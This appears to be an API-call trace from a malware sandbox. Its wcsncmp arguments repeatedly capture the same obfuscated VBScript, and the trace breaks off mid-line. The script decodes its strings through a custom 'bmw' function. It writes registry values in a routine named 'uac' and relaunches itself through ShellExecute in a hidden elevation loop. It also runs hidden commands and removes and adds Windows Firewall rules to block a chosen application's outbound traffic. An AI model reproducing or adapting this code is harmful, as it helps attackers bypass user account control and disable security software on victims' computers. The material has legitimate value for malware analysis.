bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.972] wcsncmp (_String1="= sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.972] wcsncmp (_String1=" sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.972] wcsncmp (_String1="sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.972] wcsncmp (_String1="r\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 